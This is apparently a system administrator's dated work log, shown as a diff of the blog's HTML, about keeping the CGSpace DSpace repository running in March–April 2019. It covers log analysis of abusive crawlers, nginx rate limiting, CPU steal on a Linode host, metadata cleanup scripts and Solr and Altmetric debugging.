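<Resource name="jdbc/dspace" auth="Container" type="javax.sql.DataSource"
          factory="org.apache.tomcat.jdbc.pool.DataSourceFactory"
          driverClassName="org.postgresql.Driver"
          url="jdbc:postgresql://localhost:5432/dspace"
          username="dspace" password="fuuu"
          maxActive="75"
          testOnConnect="true" testWhileIdle="true" validationQuery="SELECT 1"
          jdbcInterceptors="ConnectionState;StatementFinalizer"/>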
  • Uptime Robot reported that CGSpace went down and I see the load is very high
  • +
  • The top IPs around the time in the nginx API and web logs were:
  • +
+
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      9 190.252.43.162
+     12 157.55.39.140
+     18 157.55.39.54
+     21 66.249.66.211
+     27 40.77.167.185
+     29 138.220.87.165
+     30 157.55.39.168
+     36 157.55.39.9
+     50 52.23.239.229
+   2380 45.5.186.2
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "25/Mar/2019:(18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    354 18.195.78.144
+    363 190.216.179.100
+    386 40.77.167.185
+    484 157.55.39.168
+    507 157.55.39.9
+    536 2a01:4f8:140:3192::2
+   1123 66.249.66.211
+   1186 93.179.69.74
+   1222 35.174.184.209
+   1720 2a01:4f8:13b:1296::2
+
    +
  • The IPs look pretty normal except we’ve never seen 93.179.69.74 before, and it uses the following user agent:
  • +
+
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
+
    +
  • Surprisingly they are re-using their Tomcat session:
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
+1
+
    +
  • That’s weird because the total number of sessions today seems low compared to recent days:
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
+5657
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
+17710
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
+17179
+$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
+7904
+
    +
  • PostgreSQL seems to be pretty busy:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+     11 dspaceApi
+     10 dspaceCli
+     67 dspaceWeb
+
    +
  • I restarted Tomcat and deployed the new Tomcat JDBC settings on CGSpace since I had to restart the server anyways +
      +
    • I need to watch this carefully though because I’ve read some places that Tomcat’s DBCP doesn’t track statements and might create memory leaks if an application doesn’t close statements before a connection gets returned back to the pool
    • +
    +
  • +
  • According to Uptime Robot the server was up and down a few more times over the next hour, so I restarted Tomcat again
  • +
+

2019-03-26

+
    +
  • UptimeRobot says CGSpace went down again and I see the load is again at 14.0!
  • +
  • Here are the top IPs in nginx logs in the last hour:
  • +
+
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
+      3 35.174.184.209
+      3 66.249.66.81
+      4 104.198.9.108
+      4 154.77.98.122
+      4 2.50.152.13
+     10 196.188.12.245
+     14 66.249.66.80
+    414 45.5.184.72
+    535 45.5.186.2
+   2014 205.186.128.185
+# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(06|07)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    157 41.204.190.40
+    160 18.194.46.84
+    160 54.70.40.11
+    168 31.6.77.23
+    188 66.249.66.81
+    284 3.91.79.74
+    405 2a01:4f8:140:3192::2
+    471 66.249.66.80
+    712 35.174.184.209
+    784 2a01:4f8:13b:1296::2
+
    +
  • The two IPv6 addresses are something called BLEXBot, which seems to check the robots.txt file and then completely ignore it by making thousands of requests to dynamic pages like Browse and Discovery
  • Then 35.174.184.209 is MauiBot, which does the same thing
  • Also 3.91.79.74 does the same, and it appears to be CCBot
  • I will add these three to the “bad bot” rate limiting that I originally used for Baidu (a sketch of the nginx side is below)
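The nginx side of that rate limiting looks roughly like the following; the zone name, rate, and address list are illustrative, not our production config:

# map the abusive addresses to a non-empty key; everything else gets an empty key and is not limited
geo $badbot {
    default              "";
    35.174.184.209       badbot;
    3.91.79.74           badbot;
    2a01:4f8:13b:1296::2 badbot;
    2a01:4f8:140:3192::2 badbot;
}

limit_req_zone $badbot zone=badbots:10m rate=30r/m;

# then inside the relevant location block:
limit_req zone=badbots burst=5;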
  • Going further, these are the IPs making requests to Discovery and Browse pages so far today:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "(discover|browse)" | grep -E "26/Mar/2019:" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    120 34.207.146.166
+    128 3.91.79.74
+    132 108.179.57.67
+    143 34.228.42.25
+    185 216.244.66.198
+    430 54.70.40.11
+   1033 93.179.69.74
+   1206 2a01:4f8:140:3192::2
+   2678 2a01:4f8:13b:1296::2
+   3790 35.174.184.209
+
    +
  • 54.70.40.11 is SemanticScholarBot
  • +
  • 216.244.66.198 is DotBot
  • +
  • 93.179.69.74 is some IP in Ukraine, which I will add to the list of bot IPs in nginx
  • +
  • I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)
  • +
  • Looking at the database usage I’m wondering why there are so many connections from the DSpace CLI:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+       5 dspaceApi
+     10 dspaceCli
+     13 dspaceWeb
+
    +
  • Looking closer I see they are all idle… so at least I know the load isn’t coming from some background nightly task or something
  • +
  • Make a minor edit to my agrovoc-lookup.py script to match subject terms with parentheses like COCOA (PLANT)
  • +
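The change itself is just about the regular expression that matches subject terms; a hypothetical sketch of the idea (the real script is structured differently):

import re

# allow parenthesised qualifiers like "COCOA (PLANT)" in addition to plain terms
# (the exact character class is an assumption for illustration)
term_pattern = re.compile(r"^[A-Z0-9]+[A-Z0-9 \-()]*$")

for term in ["COCOA (PLANT)", "SOIL FERTILITY", "not a subject"]:
    print(term, bool(term_pattern.match(term)))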
  • Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
+$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
+
    +
  • UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0
  • +
  • Looking at the nginx logs I don’t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:
  • +
+
# grep SemrushBot /var/log/nginx/access.log | grep -E "26/Mar/2019" | grep -E '(discover|browse)' | wc -l
+2931
+
    +
  • So I’m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with “bot” in the name for a few days to see if things calm down… maybe not just yet
  • +
  • Otherwise, these are the top users in the web and API logs the last hour (18–19):
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10 
+     54 41.216.228.158
+     65 199.47.87.140
+     75 157.55.39.238
+     77 157.55.39.237
+     89 157.55.39.236
+    100 18.196.196.108
+    128 18.195.78.144
+    277 2a01:4f8:13b:1296::2
+    291 66.249.66.80
+    328 35.174.184.209
+# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E "26/Mar/2019:(18|19)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+      2 2409:4066:211:2caf:3c31:3fae:2212:19cc
+      2 35.10.204.140
+      2 45.251.231.45
+      2 95.108.181.88
+      2 95.137.190.2
+      3 104.198.9.108
+      3 107.167.109.88
+      6 66.249.66.80
+     13 41.89.230.156
+   1860 45.5.184.2
+
    +
  • For the XMLUI I see 18.195.78.144 and 18.196.196.108 requesting only CTA items and with no user agent
  • +
  • They are responsible for almost 1,000 XMLUI sessions today:
  • +
+
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
+937
+
    +
  • I will add their IPs to the list of bot IPs in nginx so I can tag them as bots and let Tomcat’s Crawler Session Manager Valve force them to re-use their session
  • +
  • Another user agent behaving badly in Colombia is “GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1”
  • +
  • I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request
  • +
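The valve configuration in Tomcat’s server.xml would then be something like this; the regex shown is the default pattern plus curl and is illustrative, not necessarily what we deploy:

<!-- inside the <Host> element; crawlerUserAgents is a regex matched against the User-Agent header -->
<Valve className="org.apache.catalina.valves.CrawlerSessionManagerValve"
       crawlerUserAgents=".*[bB]ot.*|.*Yahoo! Slurp.*|.*Feedfetcher-Google.*|.*[Cc]url.*"
       sessionInactiveInterval="60"/>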
  • I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E "26/Mar/2019:" | grep -E '(discover|browse)' | wc -l                                        
+119
+
    +
  • What’s strange is that I can’t see any of their requests in the DSpace log…
  • +
+
$ grep -I -c 45.5.184.72 dspace.log.2019-03-26 
+0
+

2019-03-28

+
    +
  • Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery
  • +
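The full re-index is the usual DSpace CLI invocation (assuming the dspace launcher is on the PATH):

$ dspace index-discovery -b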
  • What the hell is going on with this CTA publication?
  • +
+
# grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
+      1 37.48.65.147
+      1 80.113.172.162
+      2 108.174.5.117
+      2 83.110.14.208
+      4 18.196.8.188
+     84 18.195.78.144
+    644 18.194.46.84
+   1144 18.196.196.108
+
    +
  • None of these 18.x.x.x IPs specify a user agent and they are all on Amazon!
  • +
  • Shortly after I started the re-indexing UptimeRobot began to complain that CGSpace was down, then up, then down, then up…
  • +
  • I see the load on the server is about 10.0 again for some reason though I don’t know WHAT is causing that load +
      +
    • It could be the CPU steal metric, as if Linode has oversold the CPU resources on this VM host…
    • +
    +
  • +
  • Here are the Munin graphs of CPU usage for the last day, week, and year:
  • +
+

CPU day

+

CPU week

+

CPU year

+
    +
  • What’s clear from this is that some other VM on our host has heavy usage for about four hours at 6AM and 6PM and that during that time the load on our server spikes +
      +
    • CPU steal has drastically increased since March 25th
    • +
    • It might be time to move to dedicated CPU VM instances, or even real servers
    • +
    • For now I just sent a support ticket to bring this to Linode’s attention
    • +
    +
  • +
  • In other news, I see that it’s not even the end of the month yet and we have 3.6 million hits already:
  • +
+
# zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
+3654911
+
    +
  • In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up
  • +
+
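One way to double-check the cores from the command line is Solr’s cores admin API (port 8081 as used elsewhere in these notes):

$ http 'http://localhost:8081/solr/admin/cores?action=STATUS&wt=json'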

2019-03-29

+
    +
  • Sent Linode more information from top and iostat about the resource usage on linode18 +
      +
    • Linode agreed that the CPU steal percentage was high and migrated the VM to a new host
    • +
    • Now the resource contention is much lower according to iostat 1 10
    • +
    +
  • +
  • I restarted Tomcat to see if I could fix the missing pre-2019 statistics (yes it fixed it) +
      +
    • Though I looked in the Solr Admin UI and noticed a logging dashboard that shows warnings and errors, and the first one concerning Solr cores was at 3/27/2019, 8:50:35 AM, so I should check the logs around that time to see if something happened
    • +
    +
  • +
+

2019-03-31

+
    +
  • After a few days of the CGSpace VM (linode18) being migrated to a new host the CPU steal is gone and the site is much more responsive
  • +
+

linode18 CPU usage after migration

+
    +
  • It is frustrating to see that the load spikes caused by our own legitimate load on the server were very aggravated and drawn out by the contention for CPU on this host
  • +
  • We had 4.2 million hits this month according to the web server logs:
  • +
+
# time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Mar/2019"
+4218841
+
+real    0m26.609s
+user    0m31.657s
+sys     0m2.551s
+
    +
  • Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in 2018-10:
  • +
+
$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
+...
+0.33s user 0.07s system 2% cpu 17.167 total
+0.27s user 0.04s system 1% cpu 16.643 total
+0.24s user 0.09s system 1% cpu 17.764 total
+0.25s user 0.06s system 1% cpu 15.947 total
+
    +
  • I did some research on dedicated servers to potentially replace Linode for CGSpace stuff and it seems Hetzner is pretty good +
      +
    • This PX62-NVME system looks great and is half the price of our current Linode instance
    • It has 64GB of ECC RAM, a six-core Xeon processor from 2018, and 2x960GB of NVMe storage
    • +
    • The alternative of staying with Linode and using dedicated CPU instances with added block storage gets expensive quickly if we want to keep more than 16GB of RAM (do we?) +
        +
      • Regarding RAM, our JVM heap is 8GB and we leave the rest of the system’s 32GB of RAM to PostgreSQL and Solr buffers
      • +
      • Seeing as we have 56GB of Solr data it might be better to have more RAM in order to keep more of it in memory
      • +
      • Also, I know that the Linode block storage is a major bottleneck for Solr indexing
      • +
      +
    • +
    +
  • +
  • Looking at the weird issue with shitloads of downloads on the CTA item again
  • +
  • The item was added on 2019-03-13 and these three IPs have attempted to download the item’s bitstream 43,000 times since it was added eighteen days ago:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
+     42 196.43.180.134
+    621 185.247.144.227
+   8102 18.194.46.84
+  14927 18.196.196.108
+  20265 18.195.78.144
+
    +
  • I will send a mail to CTA to ask if they know these IPs
  • +
  • I wonder if the Cocoon errors we had earlier this month were inadvertently related to the CPU steal issue… I see very low occurrences of the “Can not load requested doc” error in the Cocoon logs the past few days
  • +
  • Helping Perttu debug some issues with the REST API on DSpace Test +
      +
    • He was getting an HTTP 500 when working with a collection, and I see the following in the DSpace log:
    • +
    +
  • +
+
2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
+
    +
  • IWMI people emailed to ask why two items with the same DOI don’t have the same Altmetric score:
  • +
  • Only the second one has an Altmetric score (208)
  • +
  • I tweeted handles for both of them to see if Altmetric will pick it up +
      +
    • About twenty minutes later the Altmetric score for the second one had increased from 208 to 209, but the first still had a score of zero
    • +
    • Interestingly, if I look at the network requests during page load for the first item I see the following response payload for the Altmetric API request:
    • +
    +
  • +
+
_altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
+
    +
  • The response payload for the second one is the same:
  • +
+
_altmetric.embed_callback({"title":"Distilling the role of ecosystem services in the Sustainable Development Goals","doi":"10.1016/j.ecoser.2017.10.010","tq":["Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of","Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers","How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!","Excellent paper about the contribution of #ecosystemservices to SDGs","So great to work with amazing collaborators"],"altmetric_jid":"521611533cf058827c00000a","issns":["2212-0416"],"journal":"Ecosystem Services","cohorts":{"sci":58,"pub":239,"doc":3,"com":2},"context":{"all":{"count":12732768,"mean":7.8220956572788,"rank":56146,"pct":99,"higher_than":12676701},"journal":{"count":549,"mean":7.7567299270073,"rank":2,"pct":99,"higher_than":547},"similar_age_3m":{"count":386919,"mean":11.573702536454,"rank":3299,"pct":99,"higher_than":383619},"similar_age_journal_3m":{"count":28,"mean":9.5648148148148,"rank":1,"pct":96,"higher_than":27}},"authors":["Sylvia L.R. Wood","Sarah K. Jones","Justin A. Johnson","Kate A. Brauman","Rebecca Chaplin-Kramer","Alexander Fremier","Evan Girvetz","Line J. Gordon","Carrie V. Kappel","Lisa Mandle","Mark Mulligan","Patrick O'Farrell","William K. Smith","Louise Willemen","Wei Zhang","Fabrice A. DeClerck"],"type":"article","handles":["10568/89975","10568/89846"],"handle":"10568/89975","altmetric_id":29816439,"schema":"1.5.4","is_oa":false,"cited_by_posts_count":377,"cited_by_tweeters_count":302,"cited_by_fbwalls_count":1,"cited_by_gplus_count":1,"cited_by_policies_count":2,"cited_by_accounts_count":306,"last_updated":1554039125,"score":208.65,"history":{"1y":54.75,"6m":10.35,"3m":5.5,"1m":5.5,"1w":1.5,"6d":1.5,"5d":1.5,"4d":1.5,"3d":1.5,"2d":1,"1d":1,"at":208.65},"url":"http://dx.doi.org/10.1016/j.ecoser.2017.10.010","added_on":1512153726,"published_on":1517443200,"readers":{"citeulike":0,"mendeley":248,"connotea":0},"readers_count":248,"images":{"small":"https://badges.altmetric.com/?size=64&score=209&types=tttttfdg","medium":"https://badges.altmetric.com/?size=100&score=209&types=tttttfdg","large":"https://badges.altmetric.com/?size=180&score=209&types=tttttfdg"},"details_url":"http://www.altmetric.com/details.php?citation_id=29816439"})
+
    +
  • Very interesting to see this in the response:
  • +
+
"handles":["10568/89975","10568/89846"],
+"handle":"10568/89975"
+

April, 2019

+ +
+

2019-04-01

+
    +
  • Meeting with AgroKnow to discuss CGSpace, ILRI data, AReS, GARDIAN, etc +
      +
    • They asked if we had plans to enable RDF support in CGSpace
    • +
    +
  • +
  • There have been 4,400 more downloads of the CTA Spore publication from those strange Amazon IP addresses today +
      +
    • I suspected that some might not be successful, because the stats show fewer downloads, but today they were all HTTP 200!
    • +
    +
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
+   4432 200
+
    +
  • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
  • +
  • Apply country and region corrections and deletions on DSpace Test and CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
+$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
+$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
+

2019-04-02

+
    +
  • CTA says the Amazon IPs are AWS gateways for real user traffic
  • +
  • I was trying to add Felix Shaw’s account back to the Administrators group on DSpace Test, but I couldn’t find his name in the user search of the groups page +
      +
    • If I searched for “Felix” or “Shaw” I saw other matches, including one for his personal email address!
    • +
    • I ended up finding him via searching for his email address
    • +
    +
  • +
+

2019-04-03

+
    +
  • Maria from Bioversity emailed me a list of new ORCID identifiers for their researchers so I will add them to our controlled vocabulary +
      +
    • First I need to extract the ones that are unique from their list compared to our existing one:
    • +
    +
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2019-04-03-orcid-ids.txt
+
    +
  • We currently have 1177 unique ORCID identifiers, and this brings our total to 1237!
  • +
  • Next I will resolve all their names using my resolve-orcids.py script:
  • +
+
$ ./resolve-orcids.py -i /tmp/2019-04-03-orcid-ids.txt -o 2019-04-03-orcid-ids.txt -d
+
    +
  • After that I added the XML formatting, formatted the file with tidy, and sorted the names in vim
  • +
  • One user’s name has changed so I will update those using my fix-metadata-values.py script:
  • +
+
$ ./fix-metadata-values.py -i 2019-04-03-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
+
    +
  • I created a pull request and merged the changes to the 5_x-prod branch (#417)
  • +
  • A few days ago I noticed some weird update process for the statistics-2018 Solr core and I see it’s still going:
  • +
+
2019-04-03 16:34:02,262 INFO  org.dspace.statistics.SolrLogger @ Updating : 1754500/21701 docs in http://localhost:8081/solr//statistics-2018
+
    +
  • Interestingly, there are 5666 occurrences, and they are mostly for the 2018 core:
  • +
+
$ grep 'org.dspace.statistics.SolrLogger @ Updating' /home/cgspace.cgiar.org/log/dspace.log.2019-04-03 | awk '{print $11}' | sort | uniq -c
+      1 
+      3 http://localhost:8081/solr//statistics-2017
+   5662 http://localhost:8081/solr//statistics-2018
+
    +
  • I will have to keep an eye on it because nothing should be updating 2018 stats in 2019…
  • +
+

2019-04-05

+
    +
  • Uptime Robot reported that CGSpace (linode18) went down tonight
  • +
  • I see there are lots of PostgreSQL connections:
  • +
+
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
+      5 dspaceApi
+     10 dspaceCli
+    250 dspaceWeb
+
    +
  • I still see those weird messages about updating the statistics-2018 Solr core:
  • +
+
2019-04-05 21:06:53,770 INFO  org.dspace.statistics.SolrLogger @ Updating : 2444600/21697 docs in http://localhost:8081/solr//statistics-2018
+
    +
  • Looking at iostat 1 10 I also see some CPU steal has come back, and I can confirm it by looking at the Munin graphs:
  • +
+

CPU usage week

+
    +
  • The other thing visible there is that the past few days the load has spiked to 500% and I don’t think it’s a coincidence that the Solr updating thing is happening…
  • +
  • I ran all system updates and rebooted the server +
      +
    • The load was lower on the server after reboot, but Solr didn’t come back up properly according to the Solr Admin UI:
    • +
    +
  • +
+
statistics-2017: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+
    +
  • I restarted it again and all the Solr cores came up properly…
  • +
+

2019-04-06

+
    +
  • Udana asked why item 10568/91278 didn’t have an Altmetric badge on CGSpace, but on the WLE website it does +
      +
    • I looked and saw that the WLE website is using the Altmetric score associated with the DOI, and that the Handle has no score at all
    • +
    • I tweeted the item and I assume this will link the Handle with the DOI in the system
    • +
    • Twenty minutes later I see the same Altmetric score (9) on CGSpace
    • +
    +
  • +
  • Linode sent an alert that there was high CPU usage this morning on CGSpace (linode18) and these were the top IPs in the webserver access logs around the time:
  • +
+
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+    222 18.195.78.144
+    245 207.46.13.58
+    303 207.46.13.194
+    328 66.249.79.33
+    564 207.46.13.210
+    566 66.249.79.62
+    575 40.77.167.66
+   1803 66.249.79.59
+   2834 2a01:4f8:140:3192::2
+   9623 45.5.184.72
+# zcat --force /var/log/nginx/{rest,oai}.log /var/log/nginx/{rest,oai}.log.1 | grep -E "06/Apr/2019:(06|07|08|09)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
+     31 66.249.79.62
+     41 207.46.13.210
+     42 40.77.167.66
+     54 42.113.50.219
+    132 66.249.79.59
+    785 2001:41d0:d:1990::
+   1164 45.5.184.72
+   2014 50.116.102.77
+   4267 45.5.186.2
+   4893 205.186.128.185
+
    +
  • 45.5.184.72 is in Colombia so it’s probably CIAT, and I see they are indeed trying to crawl the Discover pages on CIAT’s datasets collection:
  • +
+
GET /handle/10568/72970/discover?filtertype_0=type&filtertype_1=author&filter_relational_operator_1=contains&filter_relational_operator_0=equals&filter_1=&filter_0=Dataset&filtertype=dateIssued&filter_relational_operator=equals&filter=2014
+
    +
  • Their user agent is the one I added to the badbots list in nginx last week: “GuzzleHttp/6.3.3 curl/7.47.0 PHP/7.0.30-0ubuntu0.16.04.1”
  • +
  • They made 22,000 requests to Discover on this collection today alone (and it’s only 11AM):
  • +
+
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep "06/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
+  22077 /handle/10568/72970/discover
+
    +
  • Yesterday they made 43,000 requests and we actually blocked most of them:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -oE '/handle/[0-9]+/[0-9]+/discover' | sort | uniq -c 
+  43631 /handle/10568/72970/discover
+# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep "05/Apr/2019" | grep 45.5.184.72 | grep -E '/handle/[0-9]+/[0-9]+/discover' | awk '{print $9}' | sort | uniq -c 
+    142 200
+  43489 503
+
    +
  • I need to find a contact at CIAT to tell them to use the REST API rather than crawling Discover
  • +
  • Maria from Bioversity recommended that we use the phrase “AGROVOC subject” instead of “Subject” in Listings and Reports +
      +
    • I made a pull request to update this and merged it to the 5_x-prod branch (#418)
    • +
    +
  • +
+

2019-04-07

+
    +
  • Looking into the impact of harvesters like 45.5.184.72, I see in Solr that this user is not categorized as a bot so it definitely impacts the usage stats by some tens of thousands per day
  • +
  • Last week CTA switched their frontend code to use HEAD requests instead of GET requests for bitstreams +
      +
    • I am trying to see if these are registered as downloads in Solr or not
    • +
    • I see 96,925 downloads from their AWS gateway IPs in 2019-03:
    • +
    +
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-03&rows=0&wt=json&indent=true'
+{
+    "response": {
+        "docs": [],
+        "numFound": 96925,
+        "start": 0
+    },
+    "responseHeader": {
+        "QTime": 1,
+        "params": {
+            "fq": [
+                "statistics_type:view",
+                "bundleName:ORIGINAL",
+                "dateYearMonth:2019-03"
+            ],
+            "indent": "true",
+            "q": "type:0 AND (ip:18.196.196.108 OR ip:18.195.78.144 OR ip:18.195.218.6)",
+            "rows": "0",
+            "wt": "json"
+        },
+        "status": 0
+    }
+}
+
    +
  • Strangely I don’t see many hits in 2019-04:
  • +
+
$ http --print b 'http://localhost:8081/solr/statistics/select?q=type%3A0+AND+(ip%3A18.196.196.108+OR+ip%3A18.195.78.144+OR+ip%3A18.195.218.6)&fq=statistics_type%3Aview&fq=bundleName%3AORIGINAL&fq=dateYearMonth%3A2019-04&rows=0&wt=json&indent=true'
+{
+    "response": {
+        "docs": [],
+        "numFound": 38,
+        "start": 0
+    },
+    "responseHeader": {
+        "QTime": 1,
+        "params": {
+            "fq": [
